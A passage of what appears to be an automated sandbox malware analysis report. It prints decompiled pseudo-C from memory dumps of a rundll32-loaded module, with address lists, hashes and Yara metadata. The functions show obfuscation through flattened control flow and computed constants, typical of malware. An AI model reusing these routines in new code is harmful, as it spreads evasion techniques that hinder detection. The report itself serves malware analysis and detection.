				_v40 = _v40 & 0x00000000;
				_v48 = 0xea50c7;
				_v44 = 0x183406;
				_v8 = 0x4cb37c;
				_v8 = _v8 + 0xc736;
				_v8 = _v8 + 0xd4a7;
				_t91 = __edx;
				_t85 = 0x64;
				_v8 = _v8 * 0x2d;
				_v8 = _v8 ^ 0x0dcd94f9;
				_v24 = 0x238f3e;
				_v24 = _v24 << 3;
				_v24 = _v24 ^ 0x011b8be3;
				_v20 = 0x73abc8;
				_v20 = _v20 >> 3;
				_v20 = _v20 ^ 0x00035013;
				_v16 = 0x5012b6;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 / _t85;
				_v16 = _v16 ^ 0x000aff4c;
				_v12 = 0x8c34bb;
				_v12 = _v12 | 0x8c5a3f77;
				_v12 = _v12 + 0xffff11fb;
				_v12 = _v12 ^ 0x2d4fbea1;
				_v12 = _v12 ^ 0xa19c1e56;
				_v36 = 0xff820a;
				_v36 = _v36 | 0x4fe4a4bc;
				_v36 = _v36 ^ 0x4ffdd4f4;
				_v32 = 0x36506a;
				_v32 = _v32 + 0x4de;
				_v32 = _v32 ^ 0x003709b9;
				_v28 = 0x64fd3b;
				_v28 = _v28 + 0xffff3e7a;
				_v28 = _v28 ^ 0x00656766;
				if( *((intOrPtr*)(0x363210 + __edx * 4)) == 0) {
					_t83 = E00350A0E(_t85, _t85, _a4);
					_push(_v28);
					_push(_a12);
					_push(_v32);
					_push(_t83);
					 *((intOrPtr*)(0x363210 + _t91 * 4)) = E0034CDCD(_v12, _v36);
				}
				return  *((intOrPtr*)(0x363210 + _t91 * 4));
			}

0x0035aa36
0x0035aa3a
0x0035aa41
0x0035aa48
0x0035aa4f
0x0035aa56
0x0035aa62
0x0035aa68
0x0035aa69
0x0035aa6c
0x0035aa73
0x0035aa7a
0x0035aa7e
0x0035aa85
0x0035aa8c
0x0035aa90
0x0035aa97
0x0035aa9e
0x0035aaa7
0x0035aaaa
0x0035aab1
0x0035aab8
0x0035aabf
0x0035aac6
0x0035aacd
0x0035aad4
0x0035aadb
0x0035aae2
0x0035aae9
0x0035aaf0
0x0035aaf7
0x0035aafe
0x0035ab05
0x0035ab0c
0x0035ab1b
0x0035ab2e
0x0035ab33
0x0035ab36
0x0035ab39
0x0035ab42
0x0035ab4b
0x0035ab4b
0x0035ab5d

Strings

fge, xrefs: 0035AB0C
jP6, xrefs: 0035AAE9

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: fge$jP6
API String ID: 0-775479084
Opcode ID: a9116d76aeb74cc9309b8a8ce04658d9bb19871e48db55c39bf3ac6c9b6742fc
Instruction ID: 7cdcf7d1d3f0f3256163890f02d8d567d43290899f4b7f313b7e3b8cd15aadc2
Opcode Fuzzy Hash: a9116d76aeb74cc9309b8a8ce04658d9bb19871e48db55c39bf3ac6c9b6742fc
Instruction Fuzzy Hash: 1B31EEB1C00209EBCF49CFA4CA4A9AEBBB5FB09308F108548D511B6220C3B95A49DF95

Uniqueness

Uniqueness Score: -1.00%

Function 00360E3A Relevance: 2.6, Strings: 2, Instructions: 61
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E00360E3A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t61;
				intOrPtr _t66;
				void* _t73;
				intOrPtr* _t74;

				_t74 = _a16;
				_push(_t74);
				_push(_a12);
				_t73 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E003520B9(_t61);
				_v16 = 0x2b4f5d;
				_v16 = _v16 * 0x1c;
				_v16 = _v16 >> 8;
				_v16 = _v16 ^ 0x000abada;
				_v24 = 0x6f176d;
				_v24 = _v24 | 0x8892b5fd;
				_v24 = _v24 ^ 0x88fd6dba;
				_v12 = 0x9049ef;
				_v12 = _v12 >> 4;
				_v12 = _v12 ^ 0x7aa47b64;
				_v12 = _v12 ^ 0x7aa68413;
				_a16 = 0x9c064;
				_a16 = _a16 + 0x4e6a;
				_a16 = _a16 + 0xffffd44e;
				_a16 = _a16 | 0x475ceb65;
				_a16 = _a16 ^ 0x47532e3d;
				_v8 = 0xaf6c6f;
				_v8 = _v8 >> 6;
				_v8 = _v8 + 0xad29;
				_v8 = _v8 + 0xd52;
				_v8 = _v8 ^ 0x000b7d9e;
				_v20 = 0xd79f7b;
				_v20 = _v20 ^ 0x214a9efd;
				_v20 = _v20 >> 5;
				_v20 = _v20 ^ 0x010f9d8f;
				E00350DAF(_v16, __ecx, _v24,  *((intOrPtr*)(_t74 + 4)), _v12, _a16);
				E0034ED7E(_v8,  *((intOrPtr*)(__ecx + 0x24)), _v20,  *_t74,  *((intOrPtr*)(_t74 + 4)));
				_t66 =  *((intOrPtr*)(_t74 + 4));
				 *((intOrPtr*)(_t73 + 0x24)) =  *((intOrPtr*)(_t73 + 0x24)) + _t66;
				return _t66;
			}

0x00360e41
0x00360e45
0x00360e46
0x00360e49
0x00360e4b
0x00360e4e
0x00360e52
0x00360e53
0x00360e58
0x00360e65
0x00360e68
0x00360e6c
0x00360e73
0x00360e7a
0x00360e81
0x00360e88
0x00360e8f
0x00360e93
0x00360e9a
0x00360ea1
0x00360ea8
0x00360eaf
0x00360eb6
0x00360ebd
0x00360ec4
0x00360ecb
0x00360ecf
0x00360ed6
0x00360edd
0x00360ee4
0x00360eeb
0x00360ef2
0x00360ef6
0x00360f0c
0x00360f1f
0x00360f24
0x00360f2a
0x00360f32

Strings

]O+, xrefs: 00360E58
=.SG, xrefs: 00360EBD

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: =.SG$]O+
API String ID: 0-348654084
Opcode ID: 811b6f2f76830c34ea4266ae866f97b41912dbbec6264efcae1f5081a5439904
Instruction ID: d3ad0f69008f74c25b1a33b391ac4cf7726e3d66f3e87135bf28bd86c3fb9847
Opcode Fuzzy Hash: 811b6f2f76830c34ea4266ae866f97b41912dbbec6264efcae1f5081a5439904
Instruction Fuzzy Hash: CA21167180120DEFCF45DFA4DA468AEBBB1FF45304F108559E91566225C3719B24DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1001CD16 Relevance: 1.9, APIs: 1, Instructions: 445COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 1001CD1D

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
Instruction ID: 700ec683b01abb9f9f773201453a4dcf188a8b347697539dbb350c7cd9cff270
Opcode Fuzzy Hash: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
Instruction Fuzzy Hash: D5F15E7460020ABFDB15EF54C890EAE7BE9EF08350F10852AF925AF291D734ED81DB61

Uniqueness

Uniqueness Score: -1.00%

Function 0035044F Relevance: 1.5, Strings: 1, Instructions: 287
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E0035044F() {
				signed int _v4;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				void* _t309;
				intOrPtr _t310;
				void* _t311;
				intOrPtr _t321;
				intOrPtr _t325;
				void* _t329;
				signed int _t331;
				signed int _t332;
				signed int _t333;
				signed int _t334;
				signed int _t335;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				intOrPtr _t369;
				void* _t373;
				intOrPtr _t374;
				void* _t379;
				signed int* _t383;

				_t383 =  &_v140;
				_v16 = 0x8f0e94;
				_v12 = 0x9bdfd3;
				_t329 = 0;
				_v8 = _v8 & 0;
				_v4 = _v4 & 0;
				_v68 = 0xf0a33d;
				_v68 = _v68 ^ 0x64690d06;
				_v68 = _v68 >> 7;
				_v68 = _v68 ^ 0x00c9335c;
				_v96 = 0x45a6c;
				_v96 = _v96 + 0xffff2947;
				_v96 = _v96 >> 0x10;
				_v96 = _v96 ^ 0x00000003;
				_v56 = 0xab09eb;
				_v56 = _v56 | 0x7e070137;
				_v56 = _v56 ^ 0x7eaf09ff;
				_v80 = 0xa0f766;
				_v80 = _v80 | 0xafeefcb7;
				_v80 = _v80 ^ 0xafeefff7;
				_v48 = 0xf26de0;
				_v48 = _v48 + 0xffff1ff1;
				_v48 = _v48 ^ 0x00f18dd1;
				_v76 = 0x20d89d;
				_v76 = _v76 + 0xffff51c8;
				_v76 = _v76 | 0xd50d8457;
				_v76 = _v76 ^ 0xd52cfd33;
				_v136 = 0x1fce72;
				_v136 = _v136 >> 0xe;
				_v136 = _v136 | 0xd51e44d2;
				_t331 = 7;
				_v136 = _v136 / _t331;
				_v136 = _v136 ^ 0x1e7b1fff;
				_t379 = 0x1e2498b;
				_v92 = 0x2fa0bb;
				_v92 = _v92 >> 7;
				_v92 = _v92 << 1;
				_v92 = _v92 ^ 0x0000a534;
				_v52 = 0x3913b;
				_t332 = 0x4f;
				_v52 = _v52 / _t332;
				_v52 = _v52 ^ 0x00068b65;
				_v104 = 0xfffd78;
				_v104 = _v104 | 0x3b05e9e1;
				_v104 = _v104 + 0x741e;
				_v104 = _v104 ^ 0x7591a7da;
				_v104 = _v104 ^ 0x4990882f;
				_v84 = 0xe3d15a;
				_v84 = _v84 << 8;
				_v84 = _v84 ^ 0xbeb387df;
				_v84 = _v84 ^ 0x5d62ae1e;
				_v24 = 0xb3d42d;
				_v24 = _v24 | 0x6ee5a57e;
				_v24 = _v24 ^ 0x6efe8c67;
				_v60 = 0x6708ad;
				_v60 = _v60 + 0xd3fd;
				_v60 = _v60 ^ 0x0061923e;
				_v128 = 0x5551d4;
				_t333 = 0x50;
				_v128 = _v128 / _t333;
				_t334 = 0x7a;
				_v128 = _v128 / _t334;
				_t335 = 0x7e;
				_v128 = _v128 * 0x46;
				_v128 = _v128 ^ 0x000c63e9;
				_v28 = 0xd668f8;
				_v28 = _v28 << 0x10;
				_v28 = _v28 ^ 0x68f34519;
				_v112 = 0x194a18;
				_v112 = _v112 / _t335;
				_v112 = _v112 | 0xa7c33fbe;
				_t336 = 0x65;
				_v112 = _v112 / _t336;
				_v112 = _v112 ^ 0x01a285cf;
				_v44 = 0xc79794;
				_v44 = _v44 ^ 0x35aba003;
				_v44 = _v44 ^ 0x356e5b19;
				_v140 = 0x380362;
				_t337 = 0x79;
				_v140 = _v140 * 5;
				_v140 = _v140 ^ 0x1d7b2daf;
				_v140 = _v140 + 0x590f;
				_v140 = _v140 ^ 0x1c6cd8ab;
				_v120 = 0x1c8328;
				_v120 = _v120 / _t337;
				_t338 = 0xa;
				_v120 = _v120 / _t338;
				_v120 = _v120 | 0x9d020d0f;
				_v120 = _v120 ^ 0x9d02076d;
				_v124 = 0x55cbd6;
				_v124 = _v124 >> 9;
				_v124 = _v124 >> 0xc;
				_v124 = _v124 >> 6;
				_v124 = _v124 ^ 0x000fb83a;
				_v132 = 0xf0ac8c;
				_v132 = _v132 | 0x3804c269;
				_v132 = _v132 >> 1;
				_v132 = _v132 + 0xffff8da8;
				_v132 = _v132 ^ 0x1c781e64;
				_v88 = 0x7992e8;
				_v88 = _v88 | 0xba3027fa;
				_v88 = _v88 >> 9;
				_v88 = _v88 ^ 0x0051fda0;
				_v36 = 0x7aefbd;
				_v36 = _v36 + 0xfffff4eb;
				_v36 = _v36 ^ 0x0078a7fc;
				_v40 = 0xf56b46;
				_v40 = _v40 + 0xffff9ce0;
				_v40 = _v40 ^ 0x00fe48d4;
				_v108 = 0x27569f;
				_v108 = _v108 + 0x2c0a;
				_v108 = _v108 ^ 0xb442ac8c;
				_v108 = _v108 ^ 0xdc856b2a;
				_v108 = _v108 ^ 0x68e3c0da;
				_v116 = 0xbcba21;
				_v116 = _v116 << 0xd;
				_v116 = _v116 << 8;
				_v116 = _v116 >> 6;
				_v116 = _v116 ^ 0x011b605a;
				_v32 = 0x87c31e;
				_v32 = _v32 ^ 0x05bc26b1;
				_v32 = _v32 ^ 0x05363b16;
				_v100 = 0x4be1cd;
				_v100 = _v100 + 0xffff13dd;
				_v100 = _v100 | 0xdbf19b4f;
				_v100 = _v100 >> 7;
				_v100 = _v100 ^ 0x01b90151;
				_v64 = 0xb1223e;
				_v64 = _v64 | 0xb1fef6fe;
				_v64 = _v64 ^ 0xb1f65c82;
				_v72 = 0x9ef2a7;
				_v72 = _v72 * 0x66;
				_v72 = _v72 + 0xffffefd1;
				_v72 = _v72 ^ 0x3f51caaf;
				while(1) {
					L1:
					while(1) {
						_t309 = 0x546d98;
						do {
							L3:
							if(_t379 == _t309) {
								_t310 =  *0x363e00; // 0x0
								_t339 = _v56;
								_t311 = E00350DD6(_t339, _v124, _v132, _v20,  *((intOrPtr*)(_t310 + 0x14)),  *((intOrPtr*)(_t310 + 0x10)), _v88, _v36);
								_t383 =  &(_t383[6]);
								__eflags = _t311 - _v80;
								if(__eflags != 0) {
									_t379 = 0x64eb485;
									goto L14;
								} else {
									_t379 = 0xb6ab68a;
									_t329 = 1;
									goto L1;
								}
							} else {
								if(_t379 == 0x19763e8) {
									_push(_v128);
									_push(_v60);
									__eflags = E00349462(E0035DCF7(_v24, 0x3417f8, __eflags), _v112,  &_v20, 0, _v44, _v68) - _v96;
									_t339 = _v140;
									_t379 =  ==  ? 0x546d98 : 0x64eb485;
									E0034A8B0(_t339, _t313, _v120);
									_t383 =  &(_t383[8]);
									L14:
									_t369 =  *0x363e00; // 0x0
									_t309 = 0x546d98;
									goto L15;
								} else {
									if(_t379 == 0x1e2498b) {
										_push(_t339);
										_push(_t339);
										_t373 = 0x28;
										_t321 = E00347FF2(_t373);
										 *0x363e00 = _t321;
										 *((intOrPtr*)(_t321 + 0x14)) = 0x4000;
										_t374 =  *0x363e00; // 0x0
										_t325 = E00347FF2( *((intOrPtr*)(_t374 + 0x14)));
										_t369 =  *0x363e00; // 0x0
										_t379 = 0x19763e8;
										_t339 =  *((intOrPtr*)(_t369 + 0x14)) + _t325;
										 *((intOrPtr*)(_t369 + 0x10)) = _t325;
										 *((intOrPtr*)(_t369 + 0x1c)) = _t325;
										 *((intOrPtr*)(_t369 + 0x24)) = _t325;
										 *(_t369 + 4) = _t339;
										_t309 = 0x546d98;
										continue;
									} else {
										if(_t379 == 0x64eb485) {
											E00358519(_v32, _v100,  *((intOrPtr*)(_t369 + 0x10)));
											E00358519(_v64, _v72,  *0x363e00);
										} else {
											if(_t379 != 0xb6ab68a) {
												goto L15;
											} else {
												E0034957D(_v20, _v40, _v108, _v48, _v116);
											}
										}
									}
								}
							}
							L18:
							return _t329;
							L15:
							__eflags = _t379 - 0xfde45c5;
						} while (__eflags != 0);
						goto L18;
					}
				}
			}

0x0035044f
0x00350459
0x00350466
0x00350471
0x00350473
0x0035047a
0x00350481
0x00350489
0x00350491
0x00350496
0x0035049e
0x003504a6
0x003504ae
0x003504b3
0x003504b8
0x003504c0
0x003504c8
0x003504d0
0x003504d8
0x003504e0
0x003504e8
0x003504f0
0x003504f8
0x00350500
0x00350508
0x00350510
0x00350518
0x00350520
0x00350528
0x0035052d
0x0035053b
0x00350540
0x00350546
0x0035054e
0x00350553
0x0035055b
0x00350560
0x00350564
0x0035056c
0x00350578
0x0035057d
0x00350583
0x0035058b
0x00350593
0x0035059b
0x003505a3
0x003505ab
0x003505b3
0x003505bb
0x003505c0
0x003505c8
0x003505d0
0x003505db
0x003505e6
0x003505f1
0x003505f9
0x00350601
0x00350609
0x00350615
0x0035061a
0x00350624
0x00350627
0x00350634
0x00350637
0x0035063b
0x00350643
0x0035064e
0x00350656
0x00350661
0x00350671
0x00350675
0x00350681
0x00350686
0x0035068c
0x00350694
0x0035069c
0x003506a4
0x003506ac
0x003506b9
0x003506bc
0x003506c0
0x003506c8
0x003506d0
0x003506d8
0x003506e8
0x003506f0
0x003506f3
0x003506f7
0x003506ff
0x00350707
0x0035070f
0x00350714
0x00350719
0x0035071e
0x00350726
0x0035072e
0x00350736
0x0035073a
0x00350742
0x0035074a
0x00350752
0x0035075a
0x0035075f
0x00350767
0x0035076f
0x00350777
0x0035077f
0x00350787
0x0035078f
0x00350797
0x0035079f
0x003507a7
0x003507af
0x003507b7
0x003507bf
0x003507c7
0x003507cc
0x003507d1
0x003507d6
0x003507de
0x003507e6
0x003507ee
0x003507f6
0x003507fe
0x00350806
0x0035080e
0x00350818
0x00350820
0x00350828
0x00350830
0x00350838
0x00350845
0x00350849
0x00350851
0x00350859
0x00350859
0x0035085f
0x0035085f
0x00350864
0x00350864
0x00350866
0x00350985
0x0035099f
0x003509a3
0x003509a8
0x003509ab
0x003509af
0x003509be
0x00000000
0x003509b1
0x003509b3
0x003509b8
0x00000000
0x003509b8
0x0035086c
0x00350872
0x0035091a
0x00350923
0x00350963
0x00350967
0x00350970
0x00350973
0x00350978
0x003509c0
0x003509c0
0x003509c6
0x00000000
0x00350878
0x0035087e
0x003508c7
0x003508c8
0x003508cb
0x003508cc
0x003508d1
0x003508d6
0x003508e9
0x003508f2
0x003508f7
0x003508fd
0x00350907
0x00350909
0x0035090c
0x0035090f
0x00350912
0x0035085f
0x00000000
0x00350880
0x00350882
0x003509e7
0x003509fa
0x00350888
0x0035088e
0x00000000
0x00350894
0x003508ae
0x003508b3
0x0035088e
0x00350882
0x0035087e
0x00350872
0x00350a04
0x00350a0d
0x003509cb
0x003509cb
0x003509cb
0x00000000
0x003509d7
0x0035085f

Strings

,, xrefs: 0035079F

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,
API String ID: 0-2314114710
Opcode ID: e190d1ac28ffeed3ecb0a8ce94a36f4fb499a1bb946aeda8ab78049e6f3f01ec
Instruction ID: 80755d182c2e267d0dfeb4d65588014d65d806b630fda0af85a416d04d59bf36
Opcode Fuzzy Hash: e190d1ac28ffeed3ecb0a8ce94a36f4fb499a1bb946aeda8ab78049e6f3f01ec
Instruction Fuzzy Hash: 20E120725083809FD369CF25D58AA0BBBF1FBC4758F60891DF59A86260C7B2D949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 100134F0 Relevance: 1.5, APIs: 1, Instructions: 11windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 100134FE

Memory Dump Source

Source File: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.460206866.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460235744.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460243520.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460248407.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.460253343.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Iconic
String ID:
API String ID: 110040809-0
Opcode ID: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
Instruction ID: 838b9ee9edc54b62b4d2e1430c30368496747ad900502173d0e488298d75c8b4
Opcode Fuzzy Hash: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
Instruction Fuzzy Hash: D6C012B0504208EB8704CB94D940C1977A8E74D30470002CCF80C83300D531AD008655

Uniqueness

Uniqueness Score: -1.00%

Function 00359EEC Relevance: 1.5, Strings: 1, Instructions: 226
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00359EEC() {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _t207;
				intOrPtr _t209;
				intOrPtr _t212;
				intOrPtr _t214;
				intOrPtr _t218;
				void* _t219;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				signed int _t257;
				void* _t259;
				char _t263;
				void* _t264;
				void* _t266;

				_v64 = 0xd7ee0e;
				_t257 = 0x22;
				_v64 = _v64 / _t257;
				_v64 = _v64 + 0x89a9;
				_t219 = 0;
				_v64 = _v64 ^ 0x0000b335;
				_t259 = 0xb83ebc6;
				_v96 = 0xf5dfb6;
				_v96 = _v96 >> 6;
				_t221 = 0x26;
				_v96 = _v96 / _t221;
				_t222 = 0x2d;
				_v96 = _v96 * 0x58;
				_v96 = _v96 ^ 0x000b9251;
				_v60 = 0xd70e95;
				_v60 = _v60 >> 9;
				_v60 = _v60 + 0xffffe8b9;
				_v60 = _v60 ^ 0x00062b78;
				_v44 = 0xb641ac;
				_v44 = _v44 / _t222;
				_v44 = _v44 ^ 0x0002d028;
				_v52 = 0xbf8457;
				_t223 = 0x5d;
				_v52 = _v52 / _t223;
				_v52 = _v52 | 0xbb7661a2;
				_v52 = _v52 ^ 0xbb710206;
				_v80 = 0x47b11a;
				_v80 = _v80 ^ 0xc2c4229c;
				_t224 = 0x18;
				_v80 = _v80 / _t224;
				_v80 = _v80 + 0xffff1c96;
				_v80 = _v80 ^ 0x08184a4c;
				_v36 = 0x40dca8;
				_v36 = _v36 + 0x3144;
				_v36 = _v36 ^ 0x004d2780;
				_v40 = 0xec5297;
				_v40 = _v40 * 0x45;
				_v40 = _v40 ^ 0x3fbac2f2;
				_v72 = 0x18b121;
				_v72 = _v72 >> 1;
				_v72 = _v72 * 0x1e;
				_v72 = _v72 + 0xfd79;
				_v72 = _v72 ^ 0x0173ec5f;
				_v76 = 0xd8cc67;
				_v76 = _v76 >> 2;
				_v76 = _v76 >> 0xd;
				_v76 = _v76 * 0x23;
				_v76 = _v76 ^ 0x000d42f3;
				_v88 = 0x5f1bd9;
				_v88 = _v88 + 0x89b3;
				_v88 = _v88 ^ 0xee5f73f3;
				_v88 = _v88 ^ 0xfa82a5ad;
				_v88 = _v88 ^ 0x14801a76;
				_v92 = 0x778c42;
				_t225 = 0x6d;
				_v92 = _v92 * 0x69;
				_v92 = _v92 << 0xb;
				_v92 = _v92 | 0xba472be1;
				_v92 = _v92 ^ 0xfe7d7315;
				_v56 = 0x5dd318;
				_v56 = _v56 / _t257;
				_v56 = _v56 << 0xc;
				_v56 = _v56 ^ 0x2c2721c6;
				_v84 = 0xd870dc;
				_v84 = _v84 >> 0x10;
				_v84 = _v84 | 0x1345b487;
				_v84 = _v84 * 0x5a;
				_v84 = _v84 ^ 0xc68bf031;
				_v48 = 0x9a419e;
				_v48 = _v48 | 0xfa3afde2;
				_v48 = _v48 ^ 0xfabdbed6;
				_v32 = 0x7a1ab;
				_v32 = _v32 / _t225;
				_v32 = _v32 ^ 0x000f5e95;
				_v68 = 0x67bbab;
				_v68 = _v68 + 0xffffccf8;
				_v68 = _v68 ^ 0x5c1ded32;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0x4cb92f41;
				_t263 = _v28;
				_t258 = _v28;
				goto L1;
				do {
					while(1) {
						L1:
						_t266 = _t259 - 0xc23b37f;
						if(_t266 > 0) {
							break;
						}
						if(_t266 == 0) {
							E00358519(_v56, _v84, _v24);
							_t259 = 0xdb1153f;
							continue;
						}
						if(_t259 == 0xab8c2) {
							_t209 =  *0x363e10; // 0x0
							E00348ECE(_v8 + 1, _t209 + 0x1c, _v12, _v92);
							_t212 =  *0x363e10; // 0x0
							_t234 = _v16;
							_t264 = _t264 + 0xc;
							_t219 = 1;
							_t259 = 0xc23b37f;
							 *((intOrPtr*)(_t212 + 0xc)) = _v16;
							continue;
						}
						if(_t259 == 0x26dca52) {
							_t234 = _v96;
							_t214 = E0034A9CE(_v96, _t263,  &_v28, _v60, _v44);
							_t258 = _t214;
							_t264 = _t264 + 0xc;
							if(_t214 == 0) {
								goto L22;
							}
							_t259 = 0xe747a68;
							continue;
						}
						if(_t259 == 0xa9b692f) {
							_t263 = E0034F899(_t234);
							_t259 = 0x26dca52;
							continue;
						}
						if(_t259 != 0xb83ebc6) {
							goto L21;
						} else {
							_t259 = 0xa9b692f;
							continue;
						}
					}
					if(_t259 == 0xdb1153f) {
						E00344E7D(_v48, _v32, _t258, _v68);
						_t259 = 0xdb3b1d3;
						goto L21;
					}
					if(_t259 == 0xe566670) {
						_t207 = E0035894B( &_v16,  &_v24, _v36, _v40, _v72, _v76);
						_t264 = _t264 + 0x10;
						asm("sbb esi, esi");
						_t259 = ( ~_t207 & 0xf3e70543) + 0xc23b37f;
						goto L1;
					}
					if(_t259 != 0xe747a68) {
						goto L21;
					}
					_t259 = 0xdb1153f;
					if(_v28 > 2) {
						_t218 = E00344346( &_v20, _v52,  *((intOrPtr*)(_t258 + 8)), _v80);
						_v24 = _t218;
						_pop(_t234);
						if(_t218 != 0) {
							_t259 = 0xe566670;
						}
					}
					goto L1;
					L21:
				} while (_t259 != 0xdb3b1d3);
				L22:
				return _t219;
			}

0x00359eef
0x00359f03
0x00359f08
0x00359f0e
0x00359f16
0x00359f18
0x00359f20
0x00359f25
0x00359f2d
0x00359f36
0x00359f3b
0x00359f46
0x00359f49
0x00359f4d
0x00359f55
0x00359f5d
0x00359f62
0x00359f6a
0x00359f72
0x00359f82
0x00359f86
0x00359f8e
0x00359f9a
0x00359f9f
0x00359fa5
0x00359fad
0x00359fb5
0x00359fbd
0x00359fc9
0x00359fcc
0x00359fd0
0x00359fd8
0x00359fe0
0x00359fe8
0x00359ff0
0x00359ff8
0x0035a005
0x0035a009
0x0035a011
0x0035a019
0x0035a022
0x0035a026
0x0035a02e
0x0035a036
0x0035a03e
0x0035a043
0x0035a04d
0x0035a051
0x0035a059
0x0035a061
0x0035a069
0x0035a071
0x0035a079
0x0035a081
0x0035a092
0x0035a093
0x0035a097
0x0035a09c
0x0035a0a4
0x0035a0ac
0x0035a0bc
0x0035a0c0
0x0035a0c5
0x0035a0cd
0x0035a0d5
0x0035a0da
0x0035a0e7
0x0035a0eb
0x0035a0f3
0x0035a0fb
0x0035a103
0x0035a10b
0x0035a119
0x0035a11d
0x0035a125
0x0035a12d
0x0035a135
0x0035a13d
0x0035a142
0x0035a14a
0x0035a14e
0x0035a14e
0x0035a152
0x0035a152
0x0035a152
0x0035a152
0x0035a158
0x00000000
0x00000000
0x0035a15e
0x0035a216
0x0035a21c
0x00000000
0x0035a21c
0x0035a16a
0x0035a1d5
0x0035a1e9
0x0035a1ee
0x0035a1f5
0x0035a1f9
0x0035a1fc
0x0035a1fd
0x0035a202
0x00000000
0x0035a202
0x0035a172
0x0035a1af
0x0035a1b4
0x0035a1b9
0x0035a1bb
0x0035a1c0
0x00000000
0x00000000
0x0035a1c6
0x00000000
0x0035a1c6
0x0035a17a
0x0035a198
0x0035a19a
0x00000000
0x0035a19a
0x0035a182
0x00000000
0x0035a188
0x0035a188
0x00000000
0x0035a188
0x0035a182
0x0035a22c
0x0035a2c6
0x0035a2cd
0x00000000
0x0035a2cd
0x0035a238
0x0035a29a
0x0035a29f
0x0035a2a6
0x0035a2ae
0x00000000
0x0035a2ae
0x0035a240
0x00000000
0x00000000
0x0035a24b
0x0035a250
0x0035a265
